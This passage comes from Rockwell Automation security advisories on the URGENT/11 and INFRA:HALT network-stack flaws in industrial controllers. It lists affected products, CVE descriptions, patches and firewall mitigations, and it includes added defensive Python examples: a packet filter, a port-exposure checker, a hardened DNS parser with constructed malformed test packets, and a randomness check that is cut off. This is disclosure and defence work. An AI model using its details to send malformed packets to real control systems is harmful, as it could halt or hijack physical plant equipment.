| CompactLogix GuardLogix 5370 | 1769-L3S | x |   | x | x |   |   | x | x | x | x | x |
| CompactLogix 5370 | 1769-L2 | x |   | x | x |   |   | x | x | x | x | x |
| CompactLogix 5370 | 1769-L1 | x |   | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2TSC/A | x |   | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2TSC/B | x | x | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2T/C | x |   | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2T/D | x | x | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN4TR |   | x |   | x |   | x | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2TP/A | x | x | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2TR/B | x |   | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2TR/C | x | x | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN3TR/A | x | x | x | x |   |   | x |   |   |   |   |
| ControlLogix EtherNet/IP Module | 1756-EN3TR/B | x | x | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2F/B | x | x | x | x |   |   | x |   |   |   |   |
| ControlLogix EtherNet/IP Module | 1756-EN2F/C | x | x | x | x |   |   | x | x | x | x | x |
| ControlLogix EtherNet/IP Module | 1756-EN2TRXT | x |   | x | x |   |   | x | x | x | x | x |
| 1783-NATR, Network Address Translation Router | 1783-NATR |   | x |   | x |   | x | x | x | x | x | x |
| ArmorBlock® I/O Modules | 1732E-8CFGM8R | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-IB8M8SOER | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-IF4M12R | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-IR4M12R | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-IT4M12R | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-OB8M8SR | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-OF4M12R | x |   | x | x |   |   | x | x | x | x | x |
| ArmorBlock I/O Modules | 1732E-8IOLM12R |   | x |   | x |   | x | x | x | x | x | x |
| Bulletin 56RF High-Frequency RFID | 56RF-IN-IPD22 | x |   | x | x |   |   | x | x | x | x | x |
| Bulletin 56RF High-Frequency RFID | 56RF-IN-IPD22A | x |   | x | x |   |   | x | x | x | x | x |
| Bulletin 56RF High-Frequency RFID | 56RF-IN-IPS12 | x |   | x | x |   |   | x | x | x | x | x |
| SLC™ 500 EtherNet/IP Adapter | 1747-AENTR | x |   | x | x |   |   | x | x | x | x | x |
| CompactLogix E/IP Adapter | 1769-AENTR | x |   | x | x |   |   | x | x | x | x | x |
| Kinetix® 6200 Servo Multi-axis Drives | 2094-SE02F-M00-Sx | x |   | x | x |   |   | x | x | x | x | x |
| Kinetix® 6500 Servo Multi-axis Drives | 2094-EN02D-M01-Sx | x |   | x | x |   |   | x | x | x | x | x |

(x marks the CVEs that apply to the listed catalog numbers.)

Vulnerability Details

Vulnerability #1: TCP Urgent Pointer = 0 leads to integer underflow
A remote, unauthenticated threat actor could either hijack an existing TCP session or establish a new TCP session to inject malformed TCP packets to the device, resulting in a denial of service condition to the application, or could allow the execution of arbitrary code on the affected device. Products implementing non-executable memory mitigations reduce the risk of exploitation.

CVE-2019-12255 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #2: Stack overflow in the parsing of IPv4 packets’ IP options
A remote, unauthenticated threat actor could send invalid IPv4 packets, resulting in a crash to the task that receives or transmits any Ethernet packets, or could allow the execution of arbitrary code on the affected device.

CVE-2019-12256 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #3: Heap overflow in DHCP Offer/ACK parsing inside ipdhcpc
A remote, unauthenticated threat actor could use this vulnerability to overwrite the heap, which may result in a crash later on when a task requests memory from the heap.

CVE-2019-12257 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #4: Denial of Service (DoS) of TCP connection via malformed TCP options
A remote, unauthenticated threat actor who is able to figure out the source and destination TCP port and IP addresses of a session could potentially inject invalid TCP segments which cause the TCP session to be reset, resulting in a crash of the application that is reading from the affected socket.

CVE-2019-12258 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned.

Vulnerability #5: DoS via NULL dereference in IGMP parsing
An unauthenticated threat actor on the same Local Area Network (LAN) as the victim system may use this vulnerability to cause a Denial of Service condition to the task that receives and transmits Ethernet packets.

CVE-2019-12259 has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been assigned.

Vulnerability #6: TCP Urgent Pointer state confusion caused by malformed TCP AO option
A threat actor could use this vulnerability to cause a buffer overflow and a crash of the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12260 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned.

Vulnerability #7: TCP Urgent Pointer state confusion during connect() to a remote host
A threat actor could use this vulnerability to cause a buffer overflow and a crash of the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12261 has been assigned to this vulnerability. Rockwell Automation evaluated the vulnerability using the Common Vulnerability Scoring System (“CVSS”) v3.0. A CVSS v3 base score of 8.8 has been assigned.

Vulnerability #8: Handling of unsolicited Reverse Address Resolution Protocol (ARP) replies
A threat actor on the same LAN as the victim system can send reverse-ARP responses to the victim system and assign IPv4 addresses to the target, which could potentially result in network connectivity issues if any of the ARP values collide.

CVE-2019-12262 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #9: TCP Urgent Pointer state confusion due to race condition
A threat actor could use this vulnerability to cause a buffer overflow and a crash of the application that reads from the affected TCP socket, or could potentially allow the execution of arbitrary code on the affected device.

CVE-2019-12263 has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been assigned.

Vulnerability #10: Logical flaw in IPv4 assignment by the ipdhcpc DHCP client
A threat actor on the same LAN as the victim system could hijack a DHCP client session which may result in the victim incorrectly assigning a multicast IP address that originated from the threat actor.

CVE-2019-12264 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned.

Vulnerability #11: IGMP information leak via IGMPv3 specific membership report
This vulnerability may allow a threat actor on the same LAN as the victim system to transmit packets to the network that may contain information from packets that were previously sent/received by the network stack.

CVE-2019-12265 has been assigned to this vulnerability. A CVSS v3 base score of 5.4 has been assigned.
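Four of the eleven issues above (#1, #6, #7 and #9) concern handling of the TCP Urgent Pointer, and the Risk Mitigation section that follows recommends that an external firewall drop any TCP segment with the URG flag set. The following is an added worked example, not Rockwell Automation code, of what such a rule has to inspect: a minimal IPv4/TCP header parser and the pass/drop decision, run over frames constructed inline for the example (the addresses, ports and the frame builder are assumptions; checksums are left zero).

```python
"""Drop-URG packet filter for IPv4/TCP frames.

Added worked example; not Rockwell Automation code. The addresses, ports and the
frame builder below are assumptions made for the example (checksums are left zero).
"""
import struct

IPPROTO_TCP = 6
TCP_URG = 0x20   # URG bit in the TCP flags byte (CWR ECE URG ACK PSH RST SYN FIN)


def parse_ipv4_tcp(pkt: bytes):
    """Return (tcp_flags, urgent_pointer) for an IPv4/TCP frame, or None otherwise."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None                      # too short, or not IPv4
    ihl = (pkt[0] & 0x0F) * 4            # IPv4 header length in bytes
    if ihl < 20 or pkt[9] != IPPROTO_TCP or len(pkt) < ihl + 20:
        return None                      # bad IHL, not TCP, or truncated TCP header
    # TCP fixed header: sport, dport, seq, ack, data-offset byte, flags, window, csum, urg ptr
    _, _, _, _, _, flags, _, _, urg_ptr = struct.unpack("!HHIIBBHHH", pkt[ihl:ihl + 20])
    return flags, urg_ptr


def filter_decision(pkt: bytes) -> str:
    """'drop' for any TCP segment with URG set (mitigation step 1); 'pass' otherwise.
    Non-TCP and non-IPv4 frames are outside this rule's scope and pass through."""
    hdr = parse_ipv4_tcp(pkt)
    if hdr is None:
        return "pass"
    flags, _ = hdr
    return "drop" if flags & TCP_URG else "pass"


def apply_rule(packets):
    """Run the rule over a batch; returns (passed, dropped) counts."""
    decisions = [filter_decision(p) for p in packets]
    return decisions.count("pass"), decisions.count("drop")


def build_packet(flags: int, urg_ptr: int, payload: bytes = b"") -> bytes:
    """Constructed IPv4+TCP frame for exercising the rule (assumed 192.168.1.x addresses,
    destination port 44818 = EtherNet/IP explicit messaging)."""
    total_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, IPPROTO_TCP, 0,
                     bytes([192, 168, 1, 10]), bytes([192, 168, 1, 20]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 44818, 1, 1, 5 << 4, flags, 8192, 0, urg_ptr)
    return ip + tcp + payload


if __name__ == "__main__":
    samples = [
        build_packet(0x18, 0),           # PSH+ACK: ordinary traffic, passes
        build_packet(0x38, 0),           # URG+PSH+ACK with urgent pointer 0: dropped
        build_packet(0x30, 5),           # URG+ACK with a non-zero pointer: still dropped
    ]
    for p in samples:
        print(parse_ipv4_tcp(p), filter_decision(p))
    print("passed/dropped:", apply_rule(samples))
```

On a Linux netfilter firewall the same match is `-p tcp --tcp-flags URG URG -j DROP`. Industrial protocols such as EtherNet/IP do not normally use TCP urgent data, so the rule is a low-impact compensating control for devices that cannot yet take the firmware updates listed in the table that follows; it drops on the flag alone and does not need to reason about the pointer value.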

Risk Mitigation & User Action

Customers using affected products are encouraged to evaluate their risk and, when possible, combine the risk mitigation strategies provided below with the general security guidelines.

  1. Ensure all devices are placed behind an external firewall and add a rule to drop or block any TCP segment where the “URG-flag” is set.
  2. Take the suggested actions for the products in the table below:
| Product | Catalog Numbers | Suggested Actions |
|---|---|---|
| CompactLogix™ 5480 (EPIC Controller) | 5069-L4 | Upgrade to firmware version 32.013 (Download) or later. |
| Compact 5000™ I/O EtherNet/IP Adapter | 5069-AEN2TR | Will not be patched. Suggested action is to migrate to the 5069-AENTR. |
| ControlLogix EtherNet/IP Module | 1756-EN2TSC/A, 1756-EN2TSC/B | Will not be patched as it has been discontinued. |
| ControlLogix EtherNet/IP Module | 1756-EN2T/D, 1756-EN2TP/A, 1756-EN2TR/C, 1756-EN2F/C, 1756-EN4TR, 1756-EN3TR/B | Upgrade to firmware version 11.002 (Download) or later. (1756-EN4TR only) Upgrade to firmware version 3.001 (Download) or later. |
| ControlLogix EtherNet/IP Module | 1756-EN2T/C, 1756-EN2F/B, 1756-EN2TR/B, 1756-EN3TR/A | No fix. Upgrade to 1756-EN2T/D, 1756-EN2TP/A, 1756-EN2TR/C, 1756-EN2F/C, 1756-EN4TR, or 1756-EN3TR/B. |
| ControlLogix 5580 | 1756-L8 | Upgrade to firmware version 30.015 (Download), version 31.013 (Download) or version 32.013 (Download) or later. |
| GuardLogix 5580 | 1756-L8S | Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later. |
| CompactLogix 5380 | 5069-L3 | Upgrade to firmware version 30.015 (Download), version 31.013 (Download) or version 32.013 (Download) or later. |
| Compact GuardLogix 5380 | 5069-L3S2 | Upgrade to firmware version 31.013 (Download) or version 32.013 (Download) or later. |
| CompactLogix 5370 | 1769-L3, 1769-L2, 1769-L1 | Upgrade to firmware version 32.013 (Download) or later. |
| CompactLogix GuardLogix 5370 | 1769-L3S | Upgrade to firmware version 28.015 (Download) or version 32.013 (Download) or later. |
| 1783-NATR, Network Address Translation Router | 1783-NATR | Upgrade to firmware version 1.005 (Download) or later. |
| Kinetix® 6200 Servo Multi-axis Drives | 2094-SE02F-M00-Sx | Upgrade to firmware version 1.050 (Download) or later. |
| Kinetix® 6500 Servo Multi-axis Drives | 2094-EN02D-M01-Sx | Upgrade to firmware version 3.005 (Download) or later. |
| SLC 500 EtherNet/IP Adapter | 1747-AENTR | Upgrade to firmware version 2.003 (Download) or later. |
| CompactLogix E/IP Adapter | 1769-AENTR | Upgrade to firmware version 1.002 (Download) or later. |

General Security Guidelines

  • Block all traffic to EtherNet/IP or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222, Port# 44818, Port #80, and Port #161 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation products, see Knowledgebase Article ID 898270.
  • Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Please recognize that VPN is only as secure as the connected devices.
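The first guideline above names four ports (TCP/UDP 2222, 44818, 80 and 161) that must not be reachable on CIP devices from outside the Manufacturing Zone. The following is an added worked example, not Rockwell Automation code, that turns the guideline into a check over flow records: it flags any TCP or UDP flow whose source is outside the zone and whose destination is a restricted port on a device inside it. The flow-record format, the 10.10.0.0/16 zone boundary and the sample flows are all constructed assumptions for the example; a real deployment would feed it NetFlow or firewall logs and its own zone definition.

```python
"""Zone/port exposure check for the EtherNet/IP and CIP port guideline.

Added worked example; not Rockwell Automation code. The flow-record format, the zone
boundary and the sample flows below are constructed for the example.
"""
import ipaddress

# Ports named in the guideline: CIP implicit I/O (2222), EtherNet/IP explicit messaging
# (44818), HTTP (80) and SNMP (161). Assumed: the same set applies to TCP and UDP.
RESTRICTED_PORTS = {2222, 44818, 80, 161}

# Assumed zone layout for the example: the Manufacturing Zone is a single /16.
MANUFACTURING_ZONE = [ipaddress.ip_network("10.10.0.0/16")]


def in_zone(ip: str, zone=MANUFACTURING_ZONE) -> bool:
    """True if the address falls inside any of the zone's networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in zone)


def parse_flow(line: str) -> dict:
    """Parse a constructed flow record: 'PROTO src_ip:src_port -> dst_ip:dst_port'."""
    proto, rest = line.split(None, 1)
    src, dst = (s.strip() for s in rest.split("->"))
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"proto": proto.upper(), "src": src_ip, "sport": int(src_port),
            "dst": dst_ip, "dport": int(dst_port)}


def violates_guideline(flow: dict, zone=MANUFACTURING_ZONE) -> bool:
    """True when a TCP/UDP flow from outside the zone targets a restricted port inside it."""
    if flow["proto"] not in ("TCP", "UDP"):
        return False
    return (flow["dport"] in RESTRICTED_PORTS
            and in_zone(flow["dst"], zone)
            and not in_zone(flow["src"], zone))


def find_violations(lines, zone=MANUFACTURING_ZONE):
    """Return the raw records that break the guideline, in input order."""
    return [line for line in lines if violates_guideline(parse_flow(line), zone)]


SAMPLE_FLOWS = [  # constructed records for the example
    "TCP 10.10.5.20:51000 -> 10.10.1.7:44818",   # inside the zone: expected
    "TCP 172.16.40.9:52311 -> 10.10.1.7:44818",  # enterprise host to a PLC: violation
    "UDP 172.16.40.9:2222 -> 10.10.1.9:2222",    # implicit I/O from outside: violation
    "TCP 172.16.40.9:40010 -> 10.10.1.7:443",    # not a listed port: not this rule's concern
    "TCP 10.10.5.20:40011 -> 172.16.40.9:80",    # outbound, destination outside: not flagged
    "UDP 198.51.100.4:161 -> 10.10.1.12:161",    # SNMP from outside: violation
]

if __name__ == "__main__":
    for record in find_violations(SAMPLE_FLOWS):
        print("VIOLATION:", record)
```

The check is deliberately one-directional: the guideline is about inbound reachability of control devices, so outbound flows from the zone are left to other policy. A flow that the firewall should have blocked but that still shows up in flow records is exactly the evidence that the segmentation rule is missing or misconfigured.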

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (secure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • URGENT/11 General Overview, Technical Overview – Armis
  • Security Vulnerability Response Information – WindRiver
  • ICS-ADVISORY (ICSA-19-274-01) - Interpeak IPnet TCP/IP Stack

High
PN1575 | PN1575 | Interniche Vulnerabilities present in Rockwell Automation Products – “INFRA:HALT”
Published Date:
August 09, 2021
Last Updated:
September 09, 2025
CVE IDs:
CVE-2020-25767, CVE-2020-35684, CVE-2020-35685, CVE-2021-31400, CVE-2021-36762, CVE-2020-25926, CVE-2021-31226, CVE-2021-31401, CVE-2021-31228, CVE-2020-25928, CVE-2020-25927, CVE-2021-31227, CVE-2020-27565, CVE-2020-35683
Products:
AADvance, 1715 Distributed I/O, 1715 Redundant I/O, ArmorStart
CVSS Scores:
8.2, 4.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.0
Revision History
Version 2.0 - September 9, 2025
Version 1.0 – August 9, 2021

Executive Summary

Rockwell Automation received a report from CERT/CC with research done by Forescout Technologies and Vdoo regarding fourteen vulnerabilities in the products listed below. If successfully exploited, these vulnerabilities may result in the products faulting and/or ceasing communications, requiring the power to be cycled to the product to recover.

Customers using affected versions of these products are encouraged to evaluate the mitigations provided below and apply them to their deployed products. Additional details relating to the discovered vulnerabilities, including affected products and recommended countermeasures, are provided below.

Update 2.0 - September 9, 2025

Fix available for 1715-AENTR vulnerabilities

Product: 1715-AENTR
Vulnerabilities: CVE-2020-35683, CVE-2020-35684, CVE-2020-35685, CVE-2021-31400, CVE-2021-31401
Affected Versions: Firmware 3.003 and previous
Remediation: Upgrade to Version 3.011 or later.

Affected Products

  • 20-COMM-ER, All Versions
  • ArmorStart 28xE, All Versions
  • 1715-AENTR, All Versions
  • AADvance Safety Controller, All Versions
  • AADvance Eurocard Controllers, All Versions

Vulnerability Details

CVE-2020-25767: Malformed DNS Response could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed response to a DNS request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-25928: Malformed DNS Response could cause a device to fault due to a heap overflow

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in a heap-buffer overflow, leading to a possible information leak, remote code execution, or the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 9.8/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


CVE-2020-25927: Malformed DNS Response could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed DNS response, which would result in an out-of-bounds read, leading to a device fault and/or cessation of communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 8.2/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
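The three DNS-response issues above share one root cause: lengths taken from the packet are trusted before they are compared against the buffer. The following is an added example, not Rockwell Automation or NicheStack code, of a response parser that performs those checks; the messages at the bottom are constructed for the example, and the name `plc.example` is a placeholder.

```python
"""Added example (not Rockwell Automation or NicheStack code): a bounds-checked
parser for a DNS response, illustrating the length checks whose absence gives the
out-of-bounds read and heap overflow classes of CVE-2020-25767, CVE-2020-25928
and CVE-2020-25927.  The messages at the bottom are constructed for the example."""
from __future__ import annotations
import struct

MAX_NAME_LEN = 255   # RFC 1035 limits
MAX_LABEL_LEN = 63


class MalformedDNS(ValueError):
    """Raised instead of reading or writing past the message buffer."""


def parse_name(msg: bytes, offset: int) -> tuple[str, int]:
    """Decode a (possibly compressed) name at offset; return (name, end_offset).
    Every index is checked before use, pointers must point strictly backwards
    (so they cannot loop) and the decoded length is capped at 255 octets."""
    labels: list[str] = []
    total = 0
    end = None                  # offset just past the name where it was referenced
    pos = offset
    while True:
        if pos >= len(msg):
            raise MalformedDNS("name runs past end of message")
        length = msg[pos]
        if length & 0xC0 == 0xC0:          # compression pointer: 2 bytes, 14-bit offset
            if pos + 1 >= len(msg):
                raise MalformedDNS("truncated compression pointer")
            target = ((length & 0x3F) << 8) | msg[pos + 1]
            if target >= pos:
                raise MalformedDNS("compression pointer does not point backwards")
            if end is None:
                end = pos + 2
            pos = target
            continue
        if length & 0xC0:
            raise MalformedDNS("reserved label type")
        if length == 0:                    # root label terminates the name
            return ".".join(labels) or ".", (pos + 1 if end is None else end)
        if length > MAX_LABEL_LEN:
            raise MalformedDNS("label longer than 63 octets")
        if pos + 1 + length > len(msg):    # the check an out-of-bounds read lacks
            raise MalformedDNS("label runs past end of message")
        total += 1 + length
        if total > MAX_NAME_LEN:           # the check a fixed-size name buffer needs
            raise MalformedDNS("name longer than 255 octets")
        labels.append(msg[pos + 1:pos + 1 + length].decode("ascii", "replace"))
        pos += 1 + length


def parse_response(msg: bytes) -> list[tuple[str, int, bytes]]:
    """Parse header, question and answer sections; return (name, type, rdata) per answer."""
    if len(msg) < 12:
        raise MalformedDNS("header truncated")
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", msg[:12])
    pos = 12
    for _ in range(qdcount):
        _, pos = parse_name(msg, pos)
        if pos + 4 > len(msg):
            raise MalformedDNS("question truncated")
        pos += 4                                   # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        name, pos = parse_name(msg, pos)
        if pos + 10 > len(msg):
            raise MalformedDNS("resource record header truncated")
        rtype, _rclass, _ttl, rdlength = struct.unpack("!HHIH", msg[pos:pos + 10])
        pos += 10
        if pos + rdlength > len(msg):              # RDLENGTH must fit in the buffer...
            raise MalformedDNS("RDATA longer than remaining message")
        if rtype == 1 and rdlength != 4:           # ...and an A record is exactly 4 octets
            raise MalformedDNS("A record with invalid RDLENGTH")
        answers.append((name, rtype, msg[pos:pos + rdlength]))
        pos += rdlength
    return answers


def is_well_formed(msg: bytes) -> bool:
    try:
        parse_response(msg)
        return True
    except MalformedDNS:
        return False


def _encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


# Constructed messages: one valid answer (plc.example -> 10.0.0.5, using a pointer
# back to the question name) and three malformed variants of the kinds the
# advisory describes: oversized RDLENGTH, self-referencing pointer, truncated label.
_HDR = struct.pack("!6H", 0x1234, 0x8180, 1, 1, 0, 0)
_QUESTION = _encode_name("plc.example") + struct.pack("!HH", 1, 1)
GOOD = _HDR + _QUESTION + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([10, 0, 0, 5])
OVERLONG_RDATA = _HDR + _QUESTION + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4000) + bytes([10, 0, 0, 5])
POINTER_LOOP = _HDR + b"\xC0\x0C" + struct.pack("!HH", 1, 1)
TRUNCATED_LABEL = _HDR + b"\x3Fab"
```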


CVE-2020-25926: Insufficiently randomized transaction IDs could facilitate DNS cache poisoning attacks

A REMOTE, UNAUTHENTICATED attacker may be able to poison the DNS cache of the device due to transaction IDs not being properly randomized.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N


CVE-2020-27565: Malformed HTTP request could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-35683: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-35684: Malformed ICMP packet could cause a device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed ICMP packet, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CVE-2020-35685: TCP connections may be hijacked due to an insufficiently random source

A REMOTE, UNAUTHENTICATED attacker may be able to hijack a TCP connection and spoof the device’s network connections.
See the links at the end of the article to obtain more technical information regarding this vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31400: Malformed TCP segment could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP segment, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31401: Malformed TCP header could cause device to fault

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed TCP header, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31226: Malformed HTTP POST request could cause device to fault or bypass authentication

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP POST request, which would result in the device faulting and/or ceasing communications and requiring a power cycle, or possibly bypassing an authentication attempt.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 9.1/10 [CRITICAL]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H


CVE-2021-31227: Malformed HTTP POST request could cause device to fault by overwriting memory

A REMOTE, UNAUTHENTICATED attacker may be able to send a malformed HTTP POST request, which would result in the device faulting and/or ceasing communications and requiring a power cycle.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 7.5/10 [HIGH]
Researcher CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N


CVE-2021-31228: Non-random source port could lead to a spoofed DNS response

A REMOTE, UNAUTHENTICATED attacker may be able to spoof a DNS response, which would result in the device communicating with a potentially malicious server.
See the links at the end of the article to obtain more technical information regarding the vulnerability.

Researcher CVSS v3.1 Base Score: 4.0/10 [MEDIUM]
Researcher CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N
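CVE-2020-25926 and CVE-2021-31228 together remove the two unpredictable values (transaction ID and source port) that make off-path DNS spoofing impractical. The following is an added example, not Rockwell Automation code, of a check a defender can run over (txid, source port) pairs captured from a device's own DNS queries to tell whether either value is predictable; the sample captures are constructed.

```python
"""Added example (not Rockwell Automation code): a check that a device's outgoing
DNS queries use unpredictable transaction IDs and source ports, the properties
whose absence underlies CVE-2020-25926 and CVE-2021-31228.  Input is a list of
(txid, source_port) pairs observed for one device; the samples here are constructed."""
from __future__ import annotations
import math
import random
from collections import Counter


def entropy_bits(values: list[int]) -> float:
    """Shannon entropy of the observed value distribution, in bits."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())


def looks_sequential(values: list[int]) -> bool:
    """True when at least 90% of consecutive differences equal one small step
    (1..16 modulo 2^16), i.e. a counter rather than a random source."""
    diffs = [(b - a) & 0xFFFF for a, b in zip(values, values[1:])]
    if not diffs:
        return False
    step, freq = Counter(diffs).most_common(1)[0]
    return 1 <= step <= 16 and freq >= 0.9 * len(diffs)


def assess_dns_queries(samples: list[tuple[int, int]], min_samples: int = 32) -> dict:
    """Assess captured (txid, source_port) pairs from one device.
    Returns {'txid_ok': bool, 'sport_ok': bool, 'findings': [str, ...]}."""
    findings: list[str] = []
    if not samples:
        return {"txid_ok": False, "sport_ok": False, "findings": ["no samples"]}
    if len(samples) < min_samples:
        findings.append(f"only {len(samples)} samples; need at least {min_samples}")
    txids = [t for t, _ in samples]
    sports = [p for _, p in samples]
    n = len(samples)

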